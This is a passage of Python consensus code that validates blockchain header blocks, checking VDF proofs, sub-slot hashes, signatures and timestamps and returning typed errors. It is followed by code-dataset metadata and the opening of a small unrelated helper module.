sub_slot.infused_challenge_chain.infused_challenge_chain_end_of_slot_vdf.output,
)
if sub_slot.infused_challenge_chain.infused_challenge_chain_end_of_slot_vdf != dataclasses.replace(
target_vdf_info,
number_of_iterations=icc_iters_committed,
):
return None, ValidationError(Err.INVALID_ICC_EOS_VDF)
if not skip_vdf_is_valid:
if (
not sub_slot.proofs.infused_challenge_chain_slot_proof.normalized_to_identity
and not sub_slot.proofs.infused_challenge_chain_slot_proof.is_valid(
constants, icc_vdf_input, target_vdf_info, None
)
):
return None, ValidationError(Err.INVALID_ICC_EOS_VDF)
if (
sub_slot.proofs.infused_challenge_chain_slot_proof.normalized_to_identity
and not sub_slot.proofs.infused_challenge_chain_slot_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
sub_slot.infused_challenge_chain.infused_challenge_chain_end_of_slot_vdf,
)
):
return None, ValidationError(Err.INVALID_ICC_EOS_VDF)
if sub_slot.reward_chain.deficit == constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
# 2g. Check infused challenge sub-slot hash in challenge chain, deficit 16
if (
sub_slot.infused_challenge_chain.get_hash()
!= sub_slot.challenge_chain.infused_challenge_chain_sub_slot_hash
):
return None, ValidationError(Err.INVALID_ICC_HASH_CC)
else:
# 2h. Check infused challenge sub-slot hash not included for other deficits
if sub_slot.challenge_chain.infused_challenge_chain_sub_slot_hash is not None:
return None, ValidationError(Err.INVALID_ICC_HASH_CC)
# 2i. Check infused challenge sub-slot hash in reward sub-slot
if (
sub_slot.infused_challenge_chain.get_hash()
!= sub_slot.reward_chain.infused_challenge_chain_sub_slot_hash
):
return None, ValidationError(Err.INVALID_ICC_HASH_RC)
else:
# 2j. If no icc, check that the cc doesn't include it
if sub_slot.challenge_chain.infused_challenge_chain_sub_slot_hash is not None:
return None, ValidationError(Err.INVALID_ICC_HASH_CC)
# 2k. If no icc, check that the cc doesn't include it
if sub_slot.reward_chain.infused_challenge_chain_sub_slot_hash is not None:
return None, ValidationError(Err.INVALID_ICC_HASH_RC)
if sub_slot.challenge_chain.subepoch_summary_hash is not None:
assert ses_hash is None # Only one of the slots can have it
ses_hash = sub_slot.challenge_chain.subepoch_summary_hash
# 2l. check sub-epoch summary hash is None for empty slots
if finished_sub_slot_n != 0:
if sub_slot.challenge_chain.subepoch_summary_hash is not None:
return None, ValidationError(Err.INVALID_SUB_EPOCH_SUMMARY_HASH)
if can_finish_epoch and sub_slot.challenge_chain.subepoch_summary_hash is not None:
# 2m. Check new difficulty and ssi
if sub_slot.challenge_chain.new_sub_slot_iters != expected_sub_slot_iters:
return None, ValidationError(Err.INVALID_NEW_SUB_SLOT_ITERS)
if sub_slot.challenge_chain.new_difficulty != expected_difficulty:
return None, ValidationError(Err.INVALID_NEW_DIFFICULTY)
else:
# 2n. Check new difficulty and ssi are None if we don't finish epoch
if sub_slot.challenge_chain.new_sub_slot_iters is not None:
return None, ValidationError(Err.INVALID_NEW_SUB_SLOT_ITERS)
if sub_slot.challenge_chain.new_difficulty is not None:
return None, ValidationError(Err.INVALID_NEW_DIFFICULTY)
# 2o. Check challenge sub-slot hash in reward sub-slot
if sub_slot.challenge_chain.get_hash() != sub_slot.reward_chain.challenge_chain_sub_slot_hash:
return (
None,
ValidationError(
Err.INVALID_CHALLENGE_SLOT_HASH_RC,
"sub-slot hash in reward sub-slot mismatch",
),
)
eos_vdf_iters: uint64 = expected_sub_slot_iters
cc_start_element: ClassgroupElement = ClassgroupElement.get_default_element()
cc_eos_vdf_challenge: bytes32 = challenge_hash
if genesis_block:
if finished_sub_slot_n == 0:
# First block, one empty slot. prior_point is the initial challenge
rc_eos_vdf_challenge: bytes32 = constants.GENESIS_CHALLENGE
cc_eos_vdf_challenge = constants.GENESIS_CHALLENGE
else:
# First block, but have at least two empty slots
rc_eos_vdf_challenge = header_block.finished_sub_slots[
finished_sub_slot_n - 1
].reward_chain.get_hash()
else:
assert prev_b is not None
if finished_sub_slot_n == 0:
# No empty slots, so the starting point of VDF is the last reward block. Uses
# the same IPS as the previous block, since it's the same slot
rc_eos_vdf_challenge = prev_b.reward_infusion_new_challenge
eos_vdf_iters = uint64(prev_b.sub_slot_iters - prev_b.ip_iters(constants))
cc_start_element = prev_b.challenge_vdf_output
else:
# At least one empty slot, so use previous slot hash. IPS might change because it's a new slot
rc_eos_vdf_challenge = header_block.finished_sub_slots[
finished_sub_slot_n - 1
].reward_chain.get_hash()
# 2p. Check end of reward slot VDF
target_vdf_info = VDFInfo(
rc_eos_vdf_challenge,
eos_vdf_iters,
sub_slot.reward_chain.end_of_slot_vdf.output,
)
if not skip_vdf_is_valid and not sub_slot.proofs.reward_chain_slot_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
sub_slot.reward_chain.end_of_slot_vdf,
target_vdf_info,
):
return None, ValidationError(Err.INVALID_RC_EOS_VDF)
# 2q. Check challenge chain sub-slot VDF
partial_cc_vdf_info = VDFInfo(
cc_eos_vdf_challenge,
eos_vdf_iters,
sub_slot.challenge_chain.challenge_chain_end_of_slot_vdf.output,
)
if genesis_block:
cc_eos_vdf_info_iters = constants.SUB_SLOT_ITERS_STARTING
else:
assert prev_b is not None
if finished_sub_slot_n == 0:
cc_eos_vdf_info_iters = prev_b.sub_slot_iters
else:
cc_eos_vdf_info_iters = expected_sub_slot_iters
# Check that the modified data is correct
if sub_slot.challenge_chain.challenge_chain_end_of_slot_vdf != dataclasses.replace(
partial_cc_vdf_info,
number_of_iterations=cc_eos_vdf_info_iters,
):
return None, ValidationError(Err.INVALID_CC_EOS_VDF, "wrong challenge chain end of slot vdf")
if not skip_vdf_is_valid:
# Pass in None for target info since we are only checking the proof from the temporary point,
# but the challenge_chain_end_of_slot_vdf actually starts from the start of slot (for light clients)
if (
not sub_slot.proofs.challenge_chain_slot_proof.normalized_to_identity
and not sub_slot.proofs.challenge_chain_slot_proof.is_valid(
constants, cc_start_element, partial_cc_vdf_info, None
)
):
return None, ValidationError(Err.INVALID_CC_EOS_VDF)
if (
sub_slot.proofs.challenge_chain_slot_proof.normalized_to_identity
and not sub_slot.proofs.challenge_chain_slot_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
sub_slot.challenge_chain.challenge_chain_end_of_slot_vdf,
)
):
return None, ValidationError(Err.INVALID_CC_EOS_VDF)
if genesis_block:
# 2r. Check deficit (MIN_SUB.. deficit edge case for genesis block)
if sub_slot.reward_chain.deficit != constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
return (
None,
ValidationError(
Err.INVALID_DEFICIT,
f"genesis, expected deficit {constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK}",
),
)
else:
assert prev_b is not None
if prev_b.deficit == 0:
# 2s. If prev sb had deficit 0, resets deficit to MIN_BLOCK_PER_CHALLENGE_BLOCK
if sub_slot.reward_chain.deficit != constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
log.error(
constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK,
)
return (
None,
ValidationError(
Err.INVALID_DEFICIT,
f"expected deficit {constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK}, saw "
f"{sub_slot.reward_chain.deficit}",
),
)
else:
# 2t. Otherwise, deficit stays the same at the slot ends, cannot reset until 0
if sub_slot.reward_chain.deficit != prev_b.deficit:
return None, ValidationError(Err.INVALID_DEFICIT, "deficit is wrong at slot end")
# 3. Check sub-epoch summary
# Note that the subepoch summary is the summary of the previous subepoch (not the one that just finished)
if not skip_overflow_last_ss_validation:
if ses_hash is not None:
# 3a. Check that genesis block does not have sub-epoch summary
if genesis_block:
return (
None,
ValidationError(
Err.INVALID_SUB_EPOCH_SUMMARY_HASH,
"genesis with sub-epoch-summary hash",
),
)
assert prev_b is not None
# 3b. Check that we finished a slot and we finished a sub-epoch
if not new_sub_slot or not can_finish_se:
return (
None,
ValidationError(
Err.INVALID_SUB_EPOCH_SUMMARY_HASH,
f"new sub-slot: {new_sub_slot} finishes sub-epoch {can_finish_se}",
),
)
# 3c. Check the actual sub-epoch is correct
if check_sub_epoch_summary:
expected_sub_epoch_summary = make_sub_epoch_summary(
constants,
blocks,
height,
blocks.block_record(prev_b.prev_hash),
expected_difficulty if can_finish_epoch else None,
expected_sub_slot_iters if can_finish_epoch else None,
)
expected_hash = expected_sub_epoch_summary.get_hash()
if expected_hash != ses_hash:
log.error(f"{expected_sub_epoch_summary}")
return (
None,
ValidationError(
Err.INVALID_SUB_EPOCH_SUMMARY,
f"expected ses hash: {expected_hash} got {ses_hash} ",
),
)
elif new_sub_slot and not genesis_block:
# 3d. Check that we don't have to include a sub-epoch summary
if can_finish_se or can_finish_epoch:
return (
None,
ValidationError(
Err.INVALID_SUB_EPOCH_SUMMARY,
"block finishes sub-epoch but ses-hash is None",
),
)
# 4. Check if the number of blocks is less than the max
if not new_sub_slot and not genesis_block:
assert prev_b is not None
num_blocks = 2 # This includes the current block and the prev block
curr = prev_b
while not curr.first_in_sub_slot:
num_blocks += 1
curr = blocks.block_record(curr.prev_hash)
if num_blocks > constants.MAX_SUB_SLOT_BLOCKS:
return None, ValidationError(Err.TOO_MANY_BLOCKS)
# If block state is correct, we should always find a challenge here
# This computes what the challenge should be for this block
challenge = get_block_challenge(
constants,
header_block,
blocks,
genesis_block,
overflow,
skip_overflow_last_ss_validation,
)
# 5a. Check proof of space
if challenge != header_block.reward_chain_block.pos_ss_cc_challenge_hash:
log.error(f"Finished slots: {header_block.finished_sub_slots}")
log.error(
f"Data: {genesis_block} {overflow} {skip_overflow_last_ss_validation} {header_block.total_iters} "
f"{header_block.reward_chain_block.signage_point_index}"
f"Prev: {prev_b}"
)
log.error(f"Challenge {challenge} provided {header_block.reward_chain_block.pos_ss_cc_challenge_hash}")
return None, ValidationError(Err.INVALID_CC_CHALLENGE)
# 5b. Check proof of space
if header_block.reward_chain_block.challenge_chain_sp_vdf is None:
# Edge case of first sp (start of slot), where sp_iters == 0
cc_sp_hash: bytes32 = challenge
else:
cc_sp_hash = header_block.reward_chain_block.challenge_chain_sp_vdf.output.get_hash()
q_str: Optional[bytes32] = header_block.reward_chain_block.proof_of_space.verify_and_get_quality_string(
constants, challenge, cc_sp_hash
)
if q_str is None:
return None, ValidationError(Err.INVALID_POSPACE)
# 6. check signage point index
# no need to check negative values as this is uint 8
if header_block.reward_chain_block.signage_point_index >= constants.NUM_SPS_SUB_SLOT:
return None, ValidationError(Err.INVALID_SP_INDEX)
# Note that required iters might be from the previous slot (if we are in an overflow block)
required_iters: uint64 = calculate_iterations_quality(
constants.DIFFICULTY_CONSTANT_FACTOR,
q_str,
header_block.reward_chain_block.proof_of_space.size,
expected_difficulty,
cc_sp_hash,
)
# 7. check required iters
if required_iters >= calculate_sp_interval_iters(constants, expected_sub_slot_iters):
return None, ValidationError(Err.INVALID_REQUIRED_ITERS)
# 8a. check signage point index 0 has no cc sp
if (header_block.reward_chain_block.signage_point_index == 0) != (
header_block.reward_chain_block.challenge_chain_sp_vdf is None
):
return None, ValidationError(Err.INVALID_SP_INDEX)
# 8b. check signage point index 0 has no rc sp
if (header_block.reward_chain_block.signage_point_index == 0) != (
header_block.reward_chain_block.reward_chain_sp_vdf is None
):
return None, ValidationError(Err.INVALID_SP_INDEX)
sp_iters: uint64 = calculate_sp_iters(
constants,
expected_sub_slot_iters,
header_block.reward_chain_block.signage_point_index,
)
ip_iters: uint64 = calculate_ip_iters(
constants,
expected_sub_slot_iters,
header_block.reward_chain_block.signage_point_index,
required_iters,
)
if header_block.reward_chain_block.challenge_chain_sp_vdf is None:
# Blocks with very low required iters are not overflow blocks
assert not overflow
# 9. Check no overflows in the first sub-slot of a new epoch
# (although they are OK in the second sub-slot), this is important
if overflow and can_finish_epoch:
if finished_sub_slots_since_prev < 2:
return None, ValidationError(Err.NO_OVERFLOWS_IN_FIRST_SUB_SLOT_NEW_EPOCH)
# 10. Check total iters
if genesis_block:
total_iters: uint128 = uint128(expected_sub_slot_iters * finished_sub_slots_since_prev)
else:
assert prev_b is not None
if new_sub_slot:
total_iters = prev_b.total_iters
# Add the rest of the slot of prev_b
total_iters = uint128(total_iters + prev_b.sub_slot_iters - prev_b.ip_iters(constants))
# Add other empty slots
total_iters = uint128(total_iters + (expected_sub_slot_iters * (finished_sub_slots_since_prev - 1)))
else:
# Slot iters is guaranteed to be the same for header_block and prev_b
# This takes the beginning of the slot, and adds ip_iters
total_iters = uint128(prev_b.total_iters - prev_b.ip_iters(constants))
total_iters = uint128(total_iters + ip_iters)
if total_iters != header_block.reward_chain_block.total_iters:
return (
None,
ValidationError(
Err.INVALID_TOTAL_ITERS,
f"expected {total_iters} got {header_block.reward_chain_block.total_iters}",
),
)
sp_total_iters: uint128 = uint128(total_iters - ip_iters + sp_iters - (expected_sub_slot_iters if overflow else 0))
if overflow and skip_overflow_last_ss_validation:
dummy_vdf_info = VDFInfo(
bytes32([0] * 32),
uint64(1),
ClassgroupElement.get_default_element(),
)
dummy_sub_slot = EndOfSubSlotBundle(
ChallengeChainSubSlot(dummy_vdf_info, None, None, None, None),
None,
RewardChainSubSlot(dummy_vdf_info, bytes32([0] * 32), None, uint8(0)),
SubSlotProofs(VDFProof(uint8(0), b"", False), None, VDFProof(uint8(0), b"", False)),
)
sub_slots_to_pass_in = header_block.finished_sub_slots + [dummy_sub_slot]
else:
sub_slots_to_pass_in = header_block.finished_sub_slots
(
cc_vdf_challenge,
rc_vdf_challenge,
cc_vdf_input,
rc_vdf_input,
cc_vdf_iters,
rc_vdf_iters,
) = get_signage_point_vdf_info(
constants,
sub_slots_to_pass_in,
overflow,
prev_b,
blocks,
sp_total_iters,
sp_iters,
)
# 11. Check reward chain sp proof
if sp_iters != 0:
assert (
header_block.reward_chain_block.reward_chain_sp_vdf is not None
and header_block.reward_chain_sp_proof is not None
)
target_vdf_info = VDFInfo(
rc_vdf_challenge,
rc_vdf_iters,
header_block.reward_chain_block.reward_chain_sp_vdf.output,
)
if not skip_vdf_is_valid and not header_block.reward_chain_sp_proof.is_valid(
constants,
rc_vdf_input,
header_block.reward_chain_block.reward_chain_sp_vdf,
target_vdf_info,
):
return None, ValidationError(Err.INVALID_RC_SP_VDF)
rc_sp_hash = header_block.reward_chain_block.reward_chain_sp_vdf.output.get_hash()
else:
# Edge case of first sp (start of slot), where sp_iters == 0
assert overflow is not None
if header_block.reward_chain_block.reward_chain_sp_vdf is not None:
return None, ValidationError(Err.INVALID_RC_SP_VDF)
if new_sub_slot:
rc_sp_hash = header_block.finished_sub_slots[-1].reward_chain.get_hash()
else:
if genesis_block:
rc_sp_hash = constants.GENESIS_CHALLENGE
else:
assert prev_b is not None
curr = prev_b
while not curr.first_in_sub_slot:
curr = blocks.block_record(curr.prev_hash)
assert curr.finished_reward_slot_hashes is not None
rc_sp_hash = curr.finished_reward_slot_hashes[-1]
# 12. Check reward chain sp signature
if not AugSchemeMPL.verify(
header_block.reward_chain_block.proof_of_space.plot_public_key,
rc_sp_hash,
header_block.reward_chain_block.reward_chain_sp_signature,
):
return None, ValidationError(Err.INVALID_RC_SIGNATURE)
# 13. Check cc sp vdf
if sp_iters != 0:
assert header_block.reward_chain_block.challenge_chain_sp_vdf is not None
assert header_block.challenge_chain_sp_proof is not None
target_vdf_info = VDFInfo(
cc_vdf_challenge,
cc_vdf_iters,
header_block.reward_chain_block.challenge_chain_sp_vdf.output,
)
if header_block.reward_chain_block.challenge_chain_sp_vdf != dataclasses.replace(
target_vdf_info,
number_of_iterations=sp_iters,
):
return None, ValidationError(Err.INVALID_CC_SP_VDF)
if not skip_vdf_is_valid:
if (
not header_block.challenge_chain_sp_proof.normalized_to_identity
and not header_block.challenge_chain_sp_proof.is_valid(constants, cc_vdf_input, target_vdf_info, None)
):
return None, ValidationError(Err.INVALID_CC_SP_VDF)
if (
header_block.challenge_chain_sp_proof.normalized_to_identity
and not header_block.challenge_chain_sp_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
header_block.reward_chain_block.challenge_chain_sp_vdf,
)
):
return None, ValidationError(Err.INVALID_CC_SP_VDF)
else:
assert overflow is not None
if header_block.reward_chain_block.challenge_chain_sp_vdf is not None:
return None, ValidationError(Err.INVALID_CC_SP_VDF)
# 14. Check cc sp sig
if not AugSchemeMPL.verify(
header_block.reward_chain_block.proof_of_space.plot_public_key,
cc_sp_hash,
header_block.reward_chain_block.challenge_chain_sp_signature,
):
return None, ValidationError(Err.INVALID_CC_SIGNATURE, "invalid cc sp sig")
# 15. Check is_transaction_block
if genesis_block:
if header_block.foliage.foliage_transaction_block_hash is None:
return None, ValidationError(Err.INVALID_IS_TRANSACTION_BLOCK, "invalid genesis")
else:
assert prev_b is not None
# Finds the previous block
curr = prev_b
while not curr.is_transaction_block:
curr = blocks.block_record(curr.prev_hash)
# The first block to have an sp > the last tx block's infusion iters, is a tx block
if overflow:
our_sp_total_iters: uint128 = uint128(total_iters - ip_iters + sp_iters - expected_sub_slot_iters)
else:
our_sp_total_iters = uint128(total_iters - ip_iters + sp_iters)
if (our_sp_total_iters > curr.total_iters) != (header_block.foliage.foliage_transaction_block_hash is not None):
return None, ValidationError(Err.INVALID_IS_TRANSACTION_BLOCK)
if (our_sp_total_iters > curr.total_iters) != (
header_block.foliage.foliage_transaction_block_signature is not None
):
return None, ValidationError(Err.INVALID_IS_TRANSACTION_BLOCK)
# 16. Check foliage block signature by plot key
if not AugSchemeMPL.verify(
header_block.reward_chain_block.proof_of_space.plot_public_key,
header_block.foliage.foliage_block_data.get_hash(),
header_block.foliage.foliage_block_data_signature,
):
return None, ValidationError(Err.INVALID_PLOT_SIGNATURE)
# 17. Check foliage block signature by plot key
if header_block.foliage.foliage_transaction_block_hash is not None:
if not AugSchemeMPL.verify(
header_block.reward_chain_block.proof_of_space.plot_public_key,
header_block.foliage.foliage_transaction_block_hash,
header_block.foliage.foliage_transaction_block_signature,
):
return None, ValidationError(Err.INVALID_PLOT_SIGNATURE)
# 18. Check unfinished reward chain block hash
if (
header_block.reward_chain_block.get_hash()
!= header_block.foliage.foliage_block_data.unfinished_reward_block_hash
):
return None, ValidationError(Err.INVALID_URSB_HASH)
# 19. Check pool target max height
if (
header_block.foliage.foliage_block_data.pool_target.max_height != 0
and header_block.foliage.foliage_block_data.pool_target.max_height < height
):
return None, ValidationError(Err.OLD_POOL_TARGET)
# 20a. Check pre-farm puzzle hashes for genesis block.
if genesis_block:
if (
header_block.foliage.foliage_block_data.pool_target.puzzle_hash
!= constants.GENESIS_PRE_FARM_POOL_PUZZLE_HASH
):
log.error(f"Pool target {header_block.foliage.foliage_block_data.pool_target} hb {header_block}")
return None, ValidationError(Err.INVALID_PREFARM)
if (
header_block.foliage.foliage_block_data.farmer_reward_puzzle_hash
!= constants.GENESIS_PRE_FARM_FARMER_PUZZLE_HASH
):
return None, ValidationError(Err.INVALID_PREFARM)
else:
# 20b. If pospace has a pool pk, heck pool target signature. Should not check this for genesis block.
if header_block.reward_chain_block.proof_of_space.pool_public_key is not None:
assert header_block.reward_chain_block.proof_of_space.pool_contract_puzzle_hash is None
if not AugSchemeMPL.verify(
header_block.reward_chain_block.proof_of_space.pool_public_key,
bytes(header_block.foliage.foliage_block_data.pool_target),
header_block.foliage.foliage_block_data.pool_signature,
):
return None, ValidationError(Err.INVALID_POOL_SIGNATURE)
else:
# 20c. Otherwise, the plot is associated with a contract puzzle hash, not a public key
assert header_block.reward_chain_block.proof_of_space.pool_contract_puzzle_hash is not None
if (
header_block.foliage.foliage_block_data.pool_target.puzzle_hash
!= header_block.reward_chain_block.proof_of_space.pool_contract_puzzle_hash
):
return None, ValidationError(Err.INVALID_POOL_TARGET)
# 21. Check extension data if applicable. None for mainnet.
# 22. Check if foliage block is present
if (header_block.foliage.foliage_transaction_block_hash is not None) != (
header_block.foliage_transaction_block is not None
):
return None, ValidationError(Err.INVALID_FOLIAGE_BLOCK_PRESENCE)
if (header_block.foliage.foliage_transaction_block_signature is not None) != (
header_block.foliage_transaction_block is not None
):
return None, ValidationError(Err.INVALID_FOLIAGE_BLOCK_PRESENCE)
if header_block.foliage_transaction_block is not None:
# 23. Check foliage block hash
if header_block.foliage_transaction_block.get_hash() != header_block.foliage.foliage_transaction_block_hash:
return None, ValidationError(Err.INVALID_FOLIAGE_BLOCK_HASH)
if genesis_block:
# 24a. Check prev block hash for genesis
if header_block.foliage_transaction_block.prev_transaction_block_hash != constants.GENESIS_CHALLENGE:
return None, ValidationError(Err.INVALID_PREV_BLOCK_HASH)
else:
assert prev_b is not None
# 24b. Check prev block hash for non-genesis
curr_b: BlockRecord = prev_b
while not curr_b.is_transaction_block:
curr_b = blocks.block_record(curr_b.prev_hash)
if not header_block.foliage_transaction_block.prev_transaction_block_hash == curr_b.header_hash:
log.error(
f"Prev BH: {header_block.foliage_transaction_block.prev_transaction_block_hash} "
f"{curr_b.header_hash} curr sb: {curr_b}"
)
return None, ValidationError(Err.INVALID_PREV_BLOCK_HASH)
# 25. The filter hash in the Foliage Block must be the hash of the filter
if check_filter:
if header_block.foliage_transaction_block.filter_hash != std_hash(header_block.transactions_filter):
return None, ValidationError(Err.INVALID_TRANSACTIONS_FILTER_HASH)
# 26a. The timestamp in Foliage Block must not be over 5 minutes in the future
if header_block.foliage_transaction_block.timestamp > int(time.time() + constants.MAX_FUTURE_TIME):
return None, ValidationError(Err.TIMESTAMP_TOO_FAR_IN_FUTURE)
if prev_b is not None:
# 26b. The timestamp must be greater than the previous transaction block timestamp
prev_transaction_b = blocks.block_record(header_block.foliage_transaction_block.prev_transaction_block_hash)
assert prev_transaction_b.timestamp is not None
if header_block.foliage_transaction_block.timestamp <= prev_transaction_b.timestamp:
return None, ValidationError(Err.TIMESTAMP_TOO_FAR_IN_PAST)
return required_iters, None # Valid unfinished header block
def validate_finished_header_block(
constants: ConsensusConstants,
blocks: BlockchainInterface,
header_block: HeaderBlock,
check_filter: bool,
expected_difficulty: uint64,
expected_sub_slot_iters: uint64,
check_sub_epoch_summary=True,
) -> Tuple[Optional[uint64], Optional[ValidationError]]:
"""
Fully validates the header of a block. A header block is the same as a full block, but
without transactions and transaction info. Returns (required_iters, error).
"""
unfinished_header_block = UnfinishedHeaderBlock(
header_block.finished_sub_slots,
header_block.reward_chain_block.get_unfinished(),
header_block.challenge_chain_sp_proof,
header_block.reward_chain_sp_proof,
header_block.foliage,
header_block.foliage_transaction_block,
header_block.transactions_filter,
)
required_iters, validate_unfinished_err = validate_unfinished_header_block(
constants,
blocks,
unfinished_header_block,
check_filter,
expected_difficulty,
expected_sub_slot_iters,
False,
check_sub_epoch_summary=check_sub_epoch_summary,
)
genesis_block = False
if validate_unfinished_err is not None:
return None, validate_unfinished_err
assert required_iters is not None
if header_block.height == 0:
prev_b: Optional[BlockRecord] = None
genesis_block = True
else:
prev_b = blocks.block_record(header_block.prev_header_hash)
new_sub_slot: bool = len(header_block.finished_sub_slots) > 0
ip_iters: uint64 = calculate_ip_iters(
constants,
expected_sub_slot_iters,
header_block.reward_chain_block.signage_point_index,
required_iters,
)
if not genesis_block:
assert prev_b is not None
# 27. Check block height
if header_block.height != prev_b.height + 1:
return None, ValidationError(Err.INVALID_HEIGHT)
# 28. Check weight
if header_block.weight != prev_b.weight + expected_difficulty:
log.error(f"INVALID WEIGHT: {header_block} {prev_b} {expected_difficulty}")
return None, ValidationError(Err.INVALID_WEIGHT)
else:
# 27b. Check genesis block height, weight, and prev block hash
if header_block.height != uint32(0):
return None, ValidationError(Err.INVALID_HEIGHT)
if header_block.weight != constants.DIFFICULTY_STARTING:
return None, ValidationError(Err.INVALID_WEIGHT)
if header_block.prev_header_hash != constants.GENESIS_CHALLENGE:
return None, ValidationError(Err.INVALID_PREV_BLOCK_HASH)
# RC vdf challenge is taken from more recent of (slot start, prev_block)
if genesis_block:
cc_vdf_output = ClassgroupElement.get_default_element()
ip_vdf_iters = ip_iters
if new_sub_slot:
rc_vdf_challenge = header_block.finished_sub_slots[-1].reward_chain.get_hash()
else:
rc_vdf_challenge = constants.GENESIS_CHALLENGE
else:
assert prev_b is not None
if new_sub_slot:
# slot start is more recent
rc_vdf_challenge = header_block.finished_sub_slots[-1].reward_chain.get_hash()
ip_vdf_iters = ip_iters
cc_vdf_output = ClassgroupElement.get_default_element()
else:
# Prev sb is more recent
rc_vdf_challenge = prev_b.reward_infusion_new_challenge
ip_vdf_iters = uint64(header_block.reward_chain_block.total_iters - prev_b.total_iters)
cc_vdf_output = prev_b.challenge_vdf_output
# 29. Check challenge chain infusion point VDF
if new_sub_slot:
cc_vdf_challenge = header_block.finished_sub_slots[-1].challenge_chain.get_hash()
else:
# Not first block in slot
if genesis_block:
# genesis block
cc_vdf_challenge = constants.GENESIS_CHALLENGE
else:
assert prev_b is not None
# Not genesis block, go back to first block in slot
curr = prev_b
while curr.finished_challenge_slot_hashes is None:
curr = blocks.block_record(curr.prev_hash)
cc_vdf_challenge = curr.finished_challenge_slot_hashes[-1]
cc_target_vdf_info = VDFInfo(
cc_vdf_challenge,
ip_vdf_iters,
header_block.reward_chain_block.challenge_chain_ip_vdf.output,
)
if header_block.reward_chain_block.challenge_chain_ip_vdf != dataclasses.replace(
cc_target_vdf_info,
number_of_iterations=ip_iters,
):
expected = dataclasses.replace(
cc_target_vdf_info,
number_of_iterations=ip_iters,
)
log.error(f"{header_block.reward_chain_block.challenge_chain_ip_vdf }. expected {expected}")
log.error(f"Block: {header_block}")
return None, ValidationError(Err.INVALID_CC_IP_VDF)
if (
not header_block.challenge_chain_ip_proof.normalized_to_identity
and not header_block.challenge_chain_ip_proof.is_valid(
constants,
cc_vdf_output,
cc_target_vdf_info,
None,
)
):
log.error(f"Did not validate, output {cc_vdf_output}")
log.error(f"Block: {header_block}")
return None, ValidationError(Err.INVALID_CC_IP_VDF)
if (
header_block.challenge_chain_ip_proof.normalized_to_identity
and not header_block.challenge_chain_ip_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
header_block.reward_chain_block.challenge_chain_ip_vdf,
)
):
return None, ValidationError(Err.INVALID_CC_IP_VDF)
# 30. Check reward chain infusion point VDF
rc_target_vdf_info = VDFInfo(
rc_vdf_challenge,
ip_vdf_iters,
header_block.reward_chain_block.reward_chain_ip_vdf.output,
)
if not header_block.reward_chain_ip_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
header_block.reward_chain_block.reward_chain_ip_vdf,
rc_target_vdf_info,
):
return None, ValidationError(Err.INVALID_RC_IP_VDF)
# 31. Check infused challenge chain infusion point VDF
if not genesis_block:
overflow = is_overflow_block(constants, header_block.reward_chain_block.signage_point_index)
deficit = calculate_deficit(
constants,
header_block.height,
prev_b,
overflow,
len(header_block.finished_sub_slots),
)
if header_block.reward_chain_block.infused_challenge_chain_ip_vdf is None:
# If we don't have an ICC chain, deficit must be 4 or 5
if deficit < constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1:
return None, ValidationError(Err.INVALID_ICC_VDF)
else:
assert header_block.infused_challenge_chain_ip_proof is not None
# If we have an ICC chain, deficit must be 0, 1, 2 or 3
if deficit >= constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1:
return (
None,
ValidationError(
Err.INVALID_ICC_VDF,
f"icc vdf and deficit is bigger or equal to {constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1}",
),
)
if new_sub_slot:
last_ss = header_block.finished_sub_slots[-1]
assert last_ss.infused_challenge_chain is not None
icc_vdf_challenge: bytes32 = last_ss.infused_challenge_chain.get_hash()
icc_vdf_input: Optional[ClassgroupElement] = ClassgroupElement.get_default_element()
else:
assert prev_b is not None
if prev_b.is_challenge_block(constants):
icc_vdf_input = ClassgroupElement.get_default_element()
else:
icc_vdf_input = prev_b.infused_challenge_vdf_output
curr = prev_b
while curr.finished_infused_challenge_slot_hashes is None and not curr.is_challenge_block(constants):
curr = blocks.block_record(curr.prev_hash)
if curr.is_challenge_block(constants):
icc_vdf_challenge = curr.challenge_block_info_hash
else:
assert curr.finished_infused_challenge_slot_hashes is not None
icc_vdf_challenge = curr.finished_infused_challenge_slot_hashes[-1]
icc_target_vdf_info = VDFInfo(
icc_vdf_challenge,
ip_vdf_iters,
header_block.reward_chain_block.infused_challenge_chain_ip_vdf.output,
)
if icc_vdf_input is None or not header_block.infused_challenge_chain_ip_proof.is_valid(
constants,
icc_vdf_input,
header_block.reward_chain_block.infused_challenge_chain_ip_vdf,
icc_target_vdf_info,
):
return None, ValidationError(Err.INVALID_ICC_VDF, "invalid icc proof")
else:
if header_block.infused_challenge_chain_ip_proof is not None:
return None, ValidationError(Err.INVALID_ICC_VDF)
# 32. Check reward block hash
if header_block.foliage.reward_block_hash != header_block.reward_chain_block.get_hash():
return None, ValidationError(Err.INVALID_REWARD_BLOCK_HASH)
# 33. Check reward block is_transaction_block
if (
header_block.foliage.foliage_transaction_block_hash is not None
) != header_block.reward_chain_block.is_transaction_block:
return None, ValidationError(Err.INVALID_FOLIAGE_BLOCK_PRESENCE)
return required_iters, None
| 47.81391
| 120
| 0.639521
|
ac5ee8b234d3426c2dcef6f03615ff75e3083dd8
| 1,408
|
py
|
Python
|
my_lambdata/my_mod.py
|
KristineYW/lambdata-kristine
|
3ace36fb1abdd9caaa86385fba9d06b6faba546a
|
[
"MIT"
] | null | null | null |
my_lambdata/my_mod.py
|
KristineYW/lambdata-kristine
|
3ace36fb1abdd9caaa86385fba9d06b6faba546a
|
[
"MIT"
] | null | null | null |
my_lambdata/my_mod.py
|
KristineYW/lambdata-kristine
|
3ace36fb1abdd9caaa86385fba9d06b6faba546a
|
[
"MIT"
] | 1
|
2020-06-02T23:44:10.000Z
|
2020-06-02T23:44:10.000Z
|
# my_lambdata/my_mod.py
from sklearn.model_selection import train_test_split
import pandas as pd
def enlarge(n):
"""
Param n is a number
Function will enlarge the number
"""
return n * 100
